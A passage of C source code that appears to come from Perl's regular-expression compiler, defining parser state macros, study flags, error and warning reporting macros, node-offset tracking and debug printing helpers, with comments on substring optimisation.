#define RExC_in_lookbehind (pRExC_state->in_lookbehind)
#define RExC_contains_locale (pRExC_state->contains_locale)
#ifdef EBCDIC
# define RExC_recode_x_to_native (pRExC_state->recode_x_to_native)
#endif
#define RExC_in_multi_char_class (pRExC_state->in_multi_char_class)
#define RExC_frame_head (pRExC_state->frame_head)
#define RExC_frame_last (pRExC_state->frame_last)
#define RExC_frame_count (pRExC_state->frame_count)
#define RExC_strict (pRExC_state->strict)
#define RExC_study_started (pRExC_state->study_started)
#define RExC_warn_text (pRExC_state->warn_text)
#define RExC_in_script_run (pRExC_state->in_script_run)
#define RExC_use_BRANCHJ (pRExC_state->use_BRANCHJ)
#define RExC_unlexed_names (pRExC_state->unlexed_names)
/* Heuristic check on the complexity of the pattern: if TOO_NAUGHTY, we set
* a flag to disable back-off on the fixed/floating substrings - if it's
* a high complexity pattern we assume the benefit of avoiding a full match
* is worth the cost of checking for the substrings even if they rarely help.
*/
#define RExC_naughty (pRExC_state->naughty)
#define TOO_NAUGHTY (10)
#define MARK_NAUGHTY(add) \
if (RExC_naughty < TOO_NAUGHTY) \
RExC_naughty += (add)
#define MARK_NAUGHTY_EXP(exp, add) \
if (RExC_naughty < TOO_NAUGHTY) \
RExC_naughty += RExC_naughty / (exp) + (add)
#define ISMULT1(c) ((c) == '*' || (c) == '+' || (c) == '?')
#define ISMULT2(s) ((*s) == '*' || (*s) == '+' || (*s) == '?' || \
((*s) == '{' && regcurly(s)))
/*
* Flags to be passed up and down.
*/
#define WORST 0 /* Worst case. */
#define HASWIDTH 0x01 /* Known to not match null strings, could match
non-null ones. */
/* Simple enough to be STAR/PLUS operand; in an EXACTish node must be a single
* character. (There needs to be a case: in the switch statement in regexec.c
* for any node marked SIMPLE.) Note that this is not the same thing as
* REGNODE_SIMPLE */
#define SIMPLE 0x02
#define SPSTART 0x04 /* Starts with * or + */
#define POSTPONED 0x08 /* (?1),(?&name), (??{...}) or similar */
#define TRYAGAIN 0x10 /* Weeded out a declaration. */
#define RESTART_PARSE 0x20 /* Need to redo the parse */
#define NEED_UTF8 0x40 /* In conjunction with RESTART_PARSE, need to
calcuate sizes as UTF-8 */
#define REG_NODE_NUM(x) ((x) ? (int)((x)-RExC_emit_start) : -1)
/* whether trie related optimizations are enabled */
#if PERL_ENABLE_EXTENDED_TRIE_OPTIMISATION
#define TRIE_STUDY_OPT
#define FULL_TRIE_STUDY
#define TRIE_STCLASS
#endif
#define PBYTE(u8str,paren) ((U8*)(u8str))[(paren) >> 3]
#define PBITVAL(paren) (1 << ((paren) & 7))
#define PAREN_TEST(u8str,paren) ( PBYTE(u8str,paren) & PBITVAL(paren))
#define PAREN_SET(u8str,paren) PBYTE(u8str,paren) |= PBITVAL(paren)
#define PAREN_UNSET(u8str,paren) PBYTE(u8str,paren) &= (~PBITVAL(paren))
#define REQUIRE_UTF8(flagp) STMT_START { \
if (!UTF) { \
*flagp = RESTART_PARSE|NEED_UTF8; \
return 0; \
} \
} STMT_END
/* Change from /d into /u rules, and restart the parse. RExC_uni_semantics is
* a flag that indicates we need to override /d with /u as a result of
* something in the pattern. It should only be used in regards to calling
* set_regex_charset() or get_regex_charse() */
#define REQUIRE_UNI_RULES(flagp, restart_retval) \
STMT_START { \
if (DEPENDS_SEMANTICS) { \
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET); \
RExC_uni_semantics = 1; \
if (RExC_seen_d_op && LIKELY(! IN_PARENS_PASS)) { \
/* No need to restart the parse if we haven't seen \
* anything that differs between /u and /d, and no need \
* to restart immediately if we're going to reparse \
* anyway to count parens */ \
*flagp |= RESTART_PARSE; \
return restart_retval; \
} \
} \
} STMT_END
#define REQUIRE_BRANCHJ(flagp, restart_retval) \
STMT_START { \
RExC_use_BRANCHJ = 1; \
*flagp |= RESTART_PARSE; \
return restart_retval; \
} STMT_END
/* Until we have completed the parse, we leave RExC_total_parens at 0 or
* less. After that, it must always be positive, because the whole re is
* considered to be surrounded by virtual parens. Setting it to negative
* indicates there is some construct that needs to know the actual number of
* parens to be properly handled. And that means an extra pass will be
* required after we've counted them all */
#define ALL_PARENS_COUNTED (RExC_total_parens > 0)
#define REQUIRE_PARENS_PASS \
STMT_START { /* No-op if have completed a pass */ \
if (! ALL_PARENS_COUNTED) RExC_total_parens = -1; \
} STMT_END
#define IN_PARENS_PASS (RExC_total_parens < 0)
/* This is used to return failure (zero) early from the calling function if
* various flags in 'flags' are set. Two flags always cause a return:
* 'RESTART_PARSE' and 'NEED_UTF8'. 'extra' can be used to specify any
* additional flags that should cause a return; 0 if none. If the return will
* be done, '*flagp' is first set to be all of the flags that caused the
* return. */
#define RETURN_FAIL_ON_RESTART_OR_FLAGS(flags,flagp,extra) \
STMT_START { \
if ((flags) & (RESTART_PARSE|NEED_UTF8|(extra))) { \
*(flagp) = (flags) & (RESTART_PARSE|NEED_UTF8|(extra)); \
return 0; \
} \
} STMT_END
#define MUST_RESTART(flags) ((flags) & (RESTART_PARSE))
#define RETURN_FAIL_ON_RESTART(flags,flagp) \
RETURN_FAIL_ON_RESTART_OR_FLAGS( flags, flagp, 0)
#define RETURN_FAIL_ON_RESTART_FLAGP(flagp) \
if (MUST_RESTART(*(flagp))) return 0
/* This converts the named class defined in regcomp.h to its equivalent class
* number defined in handy.h. */
#define namedclass_to_classnum(class) ((int) ((class) / 2))
#define classnum_to_namedclass(classnum) ((classnum) * 2)
#define _invlist_union_complement_2nd(a, b, output) \
_invlist_union_maybe_complement_2nd(a, b, TRUE, output)
#define _invlist_intersection_complement_2nd(a, b, output) \
_invlist_intersection_maybe_complement_2nd(a, b, TRUE, output)
/* About scan_data_t.
During optimisation we recurse through the regexp program performing
various inplace (keyhole style) optimisations. In addition study_chunk
and scan_commit populate this data structure with information about
what strings MUST appear in the pattern. We look for the longest
string that must appear at a fixed location, and we look for the
longest string that may appear at a floating location. So for instance
in the pattern:
/FOO[xX]A.*B[xX]BAR/
Both 'FOO' and 'A' are fixed strings. Both 'B' and 'BAR' are floating
strings (because they follow a .* construct). study_chunk will identify
both FOO and BAR as being the longest fixed and floating strings respectively.
The strings can be composites, for instance
/(f)(o)(o)/
will result in a composite fixed substring 'foo'.
For each string some basic information is maintained:
- min_offset
This is the position the string must appear at, or not before.
It also implicitly (when combined with minlenp) tells us how many
characters must match before the string we are searching for.
Likewise when combined with minlenp and the length of the string it
tells us how many characters must appear after the string we have
found.
- max_offset
Only used for floating strings. This is the rightmost point that
the string can appear at. If set to SSize_t_MAX it indicates that the
string can occur infinitely far to the right.
For fixed strings, it is equal to min_offset.
- minlenp
A pointer to the minimum number of characters of the pattern that the
string was found inside. This is important as in the case of positive
lookahead or positive lookbehind we can have multiple patterns
involved. Consider
/(?=FOO).*F/
The minimum length of the pattern overall is 3, the minimum length
of the lookahead part is 3, but the minimum length of the part that
will actually match is 1. So 'FOO's minimum length is 3, but the
minimum length for the F is 1. This is important as the minimum length
is used to determine offsets in front of and behind the string being
looked for. Since strings can be composites this is the length of the
pattern at the time it was committed with a scan_commit. Note that
the length is calculated by study_chunk, so that the minimum lengths
are not known until the full pattern has been compiled, thus the
pointer to the value.
- lookbehind
In the case of lookbehind the string being searched for can be
offset past the start point of the final matching string.
If this value was just blithely removed from the min_offset it would
invalidate some of the calculations for how many chars must match
before or after (as they are derived from min_offset and minlen and
the length of the string being searched for).
When the final pattern is compiled and the data is moved from the
scan_data_t structure into the regexp structure the information
about lookbehind is factored in, with the information that would
have been lost precalculated in the end_shift field for the
associated string.
The fields pos_min and pos_delta are used to store the minimum offset
and the delta to the maximum offset at the current point in the pattern.
*/
struct scan_data_substrs {
SV *str; /* longest substring found in pattern */
SSize_t min_offset; /* earliest point in string it can appear */
SSize_t max_offset; /* latest point in string it can appear */
SSize_t *minlenp; /* pointer to the minlen relevant to the string */
SSize_t lookbehind; /* is the pos of the string modified by LB */
I32 flags; /* per substring SF_* and SCF_* flags */
};
typedef struct scan_data_t {
/*I32 len_min; unused */
/*I32 len_delta; unused */
SSize_t pos_min;
SSize_t pos_delta;
SV *last_found;
SSize_t last_end; /* min value, <0 unless valid. */
SSize_t last_start_min;
SSize_t last_start_max;
U8 cur_is_floating; /* whether the last_* values should be set as
* the next fixed (0) or floating (1)
* substring */
/* [0] is longest fixed substring so far, [1] is longest float so far */
struct scan_data_substrs substrs[2];
I32 flags; /* common SF_* and SCF_* flags */
I32 whilem_c;
SSize_t *last_closep;
regnode_ssc *start_class;
} scan_data_t;
/*
* Forward declarations for pregcomp()'s friends.
*/
static const scan_data_t zero_scan_data = {
0, 0, NULL, 0, 0, 0, 0,
{
{ NULL, 0, 0, 0, 0, 0 },
{ NULL, 0, 0, 0, 0, 0 },
},
0, 0, NULL, NULL
};
/* study flags */
#define SF_BEFORE_SEOL 0x0001
#define SF_BEFORE_MEOL 0x0002
#define SF_BEFORE_EOL (SF_BEFORE_SEOL|SF_BEFORE_MEOL)
#define SF_IS_INF 0x0040
#define SF_HAS_PAR 0x0080
#define SF_IN_PAR 0x0100
#define SF_HAS_EVAL 0x0200
/* SCF_DO_SUBSTR is the flag that tells the regexp analyzer to track the
* longest substring in the pattern. When it is not set the optimiser keeps
* track of position, but does not keep track of the actual strings seen,
*
* So for instance /foo/ will be parsed with SCF_DO_SUBSTR being true, but
* /foo/i will not.
*
* Similarly, /foo.*(blah|erm|huh).*fnorble/ will have "foo" and "fnorble"
* parsed with SCF_DO_SUBSTR on, but while processing the (...) it will be
* turned off because of the alternation (BRANCH). */
#define SCF_DO_SUBSTR 0x0400
#define SCF_DO_STCLASS_AND 0x0800
#define SCF_DO_STCLASS_OR 0x1000
#define SCF_DO_STCLASS (SCF_DO_STCLASS_AND|SCF_DO_STCLASS_OR)
#define SCF_WHILEM_VISITED_POS 0x2000
#define SCF_TRIE_RESTUDY 0x4000 /* Do restudy? */
#define SCF_SEEN_ACCEPT 0x8000
#define SCF_TRIE_DOING_RESTUDY 0x10000
#define SCF_IN_DEFINE 0x20000
#define UTF cBOOL(RExC_utf8)
/* The enums for all these are ordered so things work out correctly */
#define LOC (get_regex_charset(RExC_flags) == REGEX_LOCALE_CHARSET)
#define DEPENDS_SEMANTICS (get_regex_charset(RExC_flags) \
== REGEX_DEPENDS_CHARSET)
#define UNI_SEMANTICS (get_regex_charset(RExC_flags) == REGEX_UNICODE_CHARSET)
#define AT_LEAST_UNI_SEMANTICS (get_regex_charset(RExC_flags) \
>= REGEX_UNICODE_CHARSET)
#define ASCII_RESTRICTED (get_regex_charset(RExC_flags) \
== REGEX_ASCII_RESTRICTED_CHARSET)
#define AT_LEAST_ASCII_RESTRICTED (get_regex_charset(RExC_flags) \
>= REGEX_ASCII_RESTRICTED_CHARSET)
#define ASCII_FOLD_RESTRICTED (get_regex_charset(RExC_flags) \
== REGEX_ASCII_MORE_RESTRICTED_CHARSET)
#define FOLD cBOOL(RExC_flags & RXf_PMf_FOLD)
/* For programs that want to be strictly Unicode compatible by dying if any
* attempt is made to match a non-Unicode code point against a Unicode
* property. */
#define ALWAYS_WARN_SUPER ckDEAD(packWARN(WARN_NON_UNICODE))
#define OOB_NAMEDCLASS -1
/* There is no code point that is out-of-bounds, so this is problematic. But
* its only current use is to initialize a variable that is always set before
* looked at. */
#define OOB_UNICODE 0xDEADBEEF
#define CHR_SVLEN(sv) (UTF ? sv_len_utf8(sv) : SvCUR(sv))
/* length of regex to show in messages that don't mark a position within */
#define RegexLengthToShowInErrorMessages 127
/*
* If MARKER[12] are adjusted, be sure to adjust the constants at the top
* of t/op/regmesg.t, the tests in t/op/re_tests, and those in
* op/pragma/warn/regcomp.
*/
#define MARKER1 "<-- HERE" /* marker as it appears in the description */
#define MARKER2 " <-- HERE " /* marker as it appears within the regex */
#define REPORT_LOCATION " in regex; marked by " MARKER1 \
" in m/%" UTF8f MARKER2 "%" UTF8f "/"
/* The code in this file in places uses one level of recursion with parsing
* rebased to an alternate string constructed by us in memory. This can take
* the form of something that is completely different from the input, or
* something that uses the input as part of the alternate. In the first case,
* there should be no possibility of an error, as we are in complete control of
* the alternate string. But in the second case we don't completely control
* the input portion, so there may be errors in that. Here's an example:
* /[abc\x{DF}def]/ui
* is handled specially because \x{df} folds to a sequence of more than one
* character: 'ss'. What is done is to create and parse an alternate string,
* which looks like this:
* /(?:\x{DF}|[abc\x{DF}def])/ui
* where it uses the input unchanged in the middle of something it constructs,
* which is a branch for the DF outside the character class, and clustering
* parens around the whole thing. (It knows enough to skip the DF inside the
* class while in this substitute parse.) 'abc' and 'def' may have errors that
* need to be reported. The general situation looks like this:
*
* |<------- identical ------>|
* sI tI xI eI
* Input: ---------------------------------------------------------------
* Constructed: ---------------------------------------------------
* sC tC xC eC EC
* |<------- identical ------>|
*
* sI..eI is the portion of the input pattern we are concerned with here.
* sC..EC is the constructed substitute parse string.
* sC..tC is constructed by us
* tC..eC is an exact duplicate of the portion of the input pattern tI..eI.
* In the diagram, these are vertically aligned.
* eC..EC is also constructed by us.
* xC is the position in the substitute parse string where we found a
* problem.
* xI is the position in the original pattern corresponding to xC.
*
* We want to display a message showing the real input string. Thus we need to
* translate from xC to xI. We know that xC >= tC, since the portion of the
* string sC..tC has been constructed by us, and so shouldn't have errors. We
* get:
* xI = tI + (xC - tC)
*
* When the substitute parse is constructed, the code needs to set:
* RExC_start (sC)
* RExC_end (eC)
* RExC_copy_start_in_input (tI)
* RExC_copy_start_in_constructed (tC)
* and restore them when done.
*
* During normal processing of the input pattern, both
* 'RExC_copy_start_in_input' and 'RExC_copy_start_in_constructed' are set to
* sI, so that xC equals xI.
*/
#define sI RExC_precomp
#define eI RExC_precomp_end
#define sC RExC_start
#define eC RExC_end
#define tI RExC_copy_start_in_input
#define tC RExC_copy_start_in_constructed
#define xI(xC) (tI + (xC - tC))
#define xI_offset(xC) (xI(xC) - sI)
#define REPORT_LOCATION_ARGS(xC) \
UTF8fARG(UTF, \
(xI(xC) > eI) /* Don't run off end */ \
? eI - sI /* Length before the <--HERE */ \
: ((xI_offset(xC) >= 0) \
? xI_offset(xC) \
: (Perl_croak(aTHX_ "panic: %s: %d: negative offset: %" \
IVdf " trying to output message for " \
" pattern %.*s", \
__FILE__, __LINE__, (IV) xI_offset(xC), \
((int) (eC - sC)), sC), 0)), \
sI), /* The input pattern printed up to the <--HERE */ \
UTF8fARG(UTF, \
(xI(xC) > eI) ? 0 : eI - xI(xC), /* Length after <--HERE */ \
(xI(xC) > eI) ? eI : xI(xC)) /* pattern after <--HERE */
/* Used to point after bad bytes for an error message, but avoid skipping
* past a nul byte. */
#define SKIP_IF_CHAR(s, e) (!*(s) ? 0 : UTF ? UTF8_SAFE_SKIP(s, e) : 1)
/* Set up to clean up after our imminent demise */
#define PREPARE_TO_DIE \
STMT_START { \
if (RExC_rx_sv) \
SAVEFREESV(RExC_rx_sv); \
if (RExC_open_parens) \
SAVEFREEPV(RExC_open_parens); \
if (RExC_close_parens) \
SAVEFREEPV(RExC_close_parens); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then calls Perl_croak with the given
* arg. Show regex, up to a maximum length. If it's too long, chop and add
* "...".
*/
#define _FAIL(code) STMT_START { \
const char *ellipses = ""; \
IV len = RExC_precomp_end - RExC_precomp; \
\
PREPARE_TO_DIE; \
if (len > RegexLengthToShowInErrorMessages) { \
/* chop 10 shorter than the max, to ensure meaning of "..." */ \
len = RegexLengthToShowInErrorMessages - 10; \
ellipses = "..."; \
} \
code; \
} STMT_END
#define FAIL(msg) _FAIL( \
Perl_croak(aTHX_ "%s in regex m/%" UTF8f "%s/", \
msg, UTF8fARG(UTF, len, RExC_precomp), ellipses))
#define FAIL2(msg,arg) _FAIL( \
Perl_croak(aTHX_ msg " in regex m/%" UTF8f "%s/", \
arg, UTF8fARG(UTF, len, RExC_precomp), ellipses))
/*
* Simple_vFAIL -- like FAIL, but marks the current location in the scan
*/
#define Simple_vFAIL(m) STMT_START { \
Perl_croak(aTHX_ "%s" REPORT_LOCATION, \
m, REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL()
*/
#define vFAIL(m) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL(m); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts two arguments.
*/
#define Simple_vFAIL2(m,a1) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL2().
*/
#define vFAIL2(m,a1) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL2(m, a1); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts three arguments.
*/
#define Simple_vFAIL3(m, a1, a2) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/*
* Calls SAVEDESTRUCTOR_X if needed, then Simple_vFAIL3().
*/
#define vFAIL3(m,a1,a2) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL3(m, a1, a2); \
} STMT_END
/*
* Like Simple_vFAIL(), but accepts four arguments.
*/
#define Simple_vFAIL4(m, a1, a2, a3) STMT_START { \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, a3, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
#define vFAIL4(m,a1,a2,a3) STMT_START { \
PREPARE_TO_DIE; \
Simple_vFAIL4(m, a1, a2, a3); \
} STMT_END
/* A specialized version of vFAIL2 that works with UTF8f */
#define vFAIL2utf8f(m, a1) STMT_START { \
PREPARE_TO_DIE; \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
#define vFAIL3utf8f(m, a1, a2) STMT_START { \
PREPARE_TO_DIE; \
S_re_croak2(aTHX_ UTF, m, REPORT_LOCATION, a1, a2, \
REPORT_LOCATION_ARGS(RExC_parse)); \
} STMT_END
/* Setting this to NULL is a signal to not output warnings */
#define TURN_OFF_WARNINGS_IN_SUBSTITUTE_PARSE \
STMT_START { \
RExC_save_copy_start_in_constructed = RExC_copy_start_in_constructed;\
RExC_copy_start_in_constructed = NULL; \
} STMT_END
#define RESTORE_WARNINGS \
RExC_copy_start_in_constructed = RExC_save_copy_start_in_constructed
/* Since a warning can be generated multiple times as the input is reparsed, we
* output it the first time we come to that point in the parse, but suppress it
* otherwise. 'RExC_copy_start_in_constructed' being NULL is a flag to not
* generate any warnings */
#define TO_OUTPUT_WARNINGS(loc) \
( RExC_copy_start_in_constructed \
&& ((xI(loc)) - RExC_precomp) > (Ptrdiff_t) RExC_latest_warn_offset)
/* After we've emitted a warning, we save the position in the input so we don't
* output it again */
#define UPDATE_WARNINGS_LOC(loc) \
STMT_START { \
if (TO_OUTPUT_WARNINGS(loc)) { \
RExC_latest_warn_offset = MAX(sI, MIN(eI, xI(loc))) \
- RExC_precomp; \
} \
} STMT_END
/* 'warns' is the output of the packWARNx macro used in 'code' */
#define _WARN_HELPER(loc, warns, code) \
STMT_START { \
if (! RExC_copy_start_in_constructed) { \
Perl_croak( aTHX_ "panic! %s: %d: Tried to warn when none" \
" expected at '%s'", \
__FILE__, __LINE__, loc); \
} \
if (TO_OUTPUT_WARNINGS(loc)) { \
if (ckDEAD(warns)) \
PREPARE_TO_DIE; \
code; \
UPDATE_WARNINGS_LOC(loc); \
} \
} STMT_END
/* m is not necessarily a "literal string", in this macro */
#define reg_warn_non_literal_string(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
"%s" REPORT_LOCATION, \
m, REPORT_LOCATION_ARGS(loc)))
#define ckWARNreg(loc,m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc))) \
#define vWARN_dep(loc, m) \
_WARN_HELPER(loc, packWARN(WARN_DEPRECATED), \
Perl_warner(aTHX_ packWARN(WARN_DEPRECATED), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNdep(loc,m) \
_WARN_HELPER(loc, packWARN(WARN_DEPRECATED), \
Perl_ck_warner_d(aTHX_ packWARN(WARN_DEPRECATED), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNregdep(loc,m) \
_WARN_HELPER(loc, packWARN2(WARN_DEPRECATED, WARN_REGEXP), \
Perl_ck_warner_d(aTHX_ packWARN2(WARN_DEPRECATED, \
WARN_REGEXP), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARN2reg_d(loc,m, a1) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner_d(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, REPORT_LOCATION_ARGS(loc)))
#define ckWARN2reg(loc, m, a1) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, REPORT_LOCATION_ARGS(loc)))
#define vWARN3(loc, m, a1, a2) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, REPORT_LOCATION_ARGS(loc)))
#define ckWARN3reg(loc, m, a1, a2) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN4(loc, m, a1, a2, a3) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARN4reg(loc, m, a1, a2, a3) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, \
REPORT_LOCATION_ARGS(loc)))
#define vWARN5(loc, m, a1, a2, a3, a4) \
_WARN_HELPER(loc, packWARN(WARN_REGEXP), \
Perl_warner(aTHX_ packWARN(WARN_REGEXP), \
m REPORT_LOCATION, \
a1, a2, a3, a4, \
REPORT_LOCATION_ARGS(loc)))
#define ckWARNexperimental(loc, class, m) \
_WARN_HELPER(loc, packWARN(class), \
Perl_ck_warner_d(aTHX_ packWARN(class), \
m REPORT_LOCATION, \
REPORT_LOCATION_ARGS(loc)))
/* Convert between a pointer to a node and its offset from the beginning of the
* program */
#define REGNODE_p(offset) (RExC_emit_start + (offset))
#define REGNODE_OFFSET(node) ((node) - RExC_emit_start)
/* Macros for recording node offsets. 20001227 mjd@plover.com
* Nodes are numbered 1, 2, 3, 4. Node #n's position is recorded in
* element 2*n-1 of the array. Element #2n holds the byte length node #n.
* Element 0 holds the number n.
* Position is 1 indexed.
*/
#ifndef RE_TRACK_PATTERN_OFFSETS
#define Set_Node_Offset_To_R(offset,byte)
#define Set_Node_Offset(node,byte)
#define Set_Cur_Node_Offset
#define Set_Node_Length_To_R(node,len)
#define Set_Node_Length(node,len)
#define Set_Node_Cur_Length(node,start)
#define Node_Offset(n)
#define Node_Length(n)
#define Set_Node_Offset_Length(node,offset,len)
#define ProgLen(ri) ri->u.proglen
#define SetProgLen(ri,x) ri->u.proglen = x
#define Track_Code(code)
#else
#define ProgLen(ri) ri->u.offsets[0]
#define SetProgLen(ri,x) ri->u.offsets[0] = x
#define Set_Node_Offset_To_R(offset,byte) STMT_START { \
MJD_OFFSET_DEBUG(("** (%d) offset of node %d is %d.\n", \
__LINE__, (int)(offset), (int)(byte))); \
if((offset) < 0) { \
Perl_croak(aTHX_ "value of node is %d in Offset macro", \
(int)(offset)); \
} else { \
RExC_offsets[2*(offset)-1] = (byte); \
} \
} STMT_END
#define Set_Node_Offset(node,byte) \
Set_Node_Offset_To_R(REGNODE_OFFSET(node), (byte)-RExC_start)
#define Set_Cur_Node_Offset Set_Node_Offset(RExC_emit, RExC_parse)
#define Set_Node_Length_To_R(node,len) STMT_START { \
MJD_OFFSET_DEBUG(("** (%d) size of node %d is %d.\n", \
__LINE__, (int)(node), (int)(len))); \
if((node) < 0) { \
Perl_croak(aTHX_ "value of node is %d in Length macro", \
(int)(node)); \
} else { \
RExC_offsets[2*(node)] = (len); \
} \
} STMT_END
#define Set_Node_Length(node,len) \
Set_Node_Length_To_R(REGNODE_OFFSET(node), len)
#define Set_Node_Cur_Length(node, start) \
Set_Node_Length(node, RExC_parse - start)
/* Get offsets and lengths */
#define Node_Offset(n) (RExC_offsets[2*(REGNODE_OFFSET(n))-1])
#define Node_Length(n) (RExC_offsets[2*(REGNODE_OFFSET(n))])
#define Set_Node_Offset_Length(node,offset,len) STMT_START { \
Set_Node_Offset_To_R(REGNODE_OFFSET(node), (offset)); \
Set_Node_Length_To_R(REGNODE_OFFSET(node), (len)); \
} STMT_END
#define Track_Code(code) STMT_START { code } STMT_END
#endif
#if PERL_ENABLE_EXPERIMENTAL_REGEX_OPTIMISATIONS
#define EXPERIMENTAL_INPLACESCAN
#endif /*PERL_ENABLE_EXPERIMENTAL_REGEX_OPTIMISATIONS*/
#ifdef DEBUGGING
int
Perl_re_printf(pTHX_ const char *fmt, ...)
{
va_list ap;
int result;
PerlIO *f= Perl_debug_log;
PERL_ARGS_ASSERT_RE_PRINTF;
va_start(ap, fmt);
result = PerlIO_vprintf(f, fmt, ap);
va_end(ap);
return result;
}
int
Perl_re_indentf(pTHX_ const char *fmt, U32 depth, ...)
{
va_list ap;
int result;
PerlIO *f= Perl_debug_log;
PERL_ARGS_ASSERT_RE_INDENTF;
va_start(ap, depth);
PerlIO_printf(f, "%*s", ( (int)depth % 20 ) * 2, "");
result = PerlIO_vprintf(f, fmt, ap);
va_end(ap);
return result;
}
#endif /* DEBUGGING */
#define DEBUG_RExC_seen() \
DEBUG_OPTIMISE_MORE_r({ \
Perl_re_printf( aTHX_ "RExC_seen: "); \
\
if (RExC_seen & REG_ZERO_LEN_SEEN) \
Perl_re_printf( aTHX_ "REG_ZERO_LEN_SEEN "); \
\
if (RExC_seen & REG_LOOKBEHIND_SEEN) \
Perl_re_printf( aTHX_ "REG_LOOKBEHIND_SEEN "); \
\
if (RExC_seen & REG_GPOS_SEEN) \
Perl_re_printf( aTHX_ "REG_GPOS_SEEN "); \
\
if (RExC_seen & REG_RECURSE_SEEN) \
Perl_re_printf( aTHX_ "REG_RECURSE_SEEN "); \
\
if (RExC_seen & REG_TOP_LEVEL_BRANCHES_SEEN) \
Perl_re_printf( aTHX_ "REG_TOP_LEVEL_BRANCHES_SEEN "); \
\
if (RExC_seen & REG_VERBARG_SEEN) \
Perl_re_printf( aTHX_ "REG_VERBARG_SEEN "); \
\
if (RExC_seen & REG_CUTGROUP_SEEN) \
Perl_re_printf( aTHX_ "REG_CUTGROUP_SEEN "); \
\
if (RExC_seen & REG_RUN_ON_COMMENT_SEEN) \
Perl_re_printf( aTHX_ "REG_RUN_ON_COMMENT_SEEN "); \
\
if (RExC_seen & REG_UNFOLDED_MULTI_SEEN) \
Perl_re_printf( aTHX_ "REG_UNFOLDED_MULTI_SEEN "); \
\
if (RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN) \
Perl_re_printf( aTHX_ "REG_UNBOUNDED_QUANTIFIER_SEEN "); \
\
Perl_re_printf( aTHX_ "\n"); \
});
#define DEBUG_SHOW_STUDY_FLAG(flags,flag) \
if ((flags) & flag) Perl_re_printf( aTHX_ "%s ", #flag)
#ifdef DEBUGGING
static void
S_debug_show_study_flags(pTHX_ U32 flags, const char *open_str,
const char *close_str)
{
if (!flags)
return;
Perl_re_printf( aTHX_ "%s", open_str);
DEBUG_SHOW_STUDY_FLAG(flags, SF_BEFORE_SEOL);
DEBUG_SHOW_STUDY_FLAG(flags, SF_BEFORE_MEOL);
DEBUG_SHOW_STUDY_FLAG(flags, SF_IS_INF);
DEBUG_SHOW_STUDY_FLAG(flags, SF_HAS_PAR);
DEBUG_SHOW_STUDY_FLAG(flags, SF_IN_PAR);
DEBUG_SHOW_STUDY_FLAG(flags, SF_HAS_EVAL);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_SUBSTR);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS_AND);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS_OR);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_DO_STCLASS);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_WHILEM_VISITED_POS);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_TRIE_RESTUDY);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_SEEN_ACCEPT);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_TRIE_DOING_RESTUDY);
DEBUG_SHOW_STUDY_FLAG(flags, SCF_IN_DEFINE);
Perl_re_printf( aTHX_ "%s", close_str);
}
static void
S_debug_studydata(pTHX_ const char *where, scan_data_t *data,
U32 depth, int is_inf)
{
GET_RE_DEBUG_FLAGS_DECL;
DEBUG_OPTIMISE_MORE_r({
if (!data)
return;
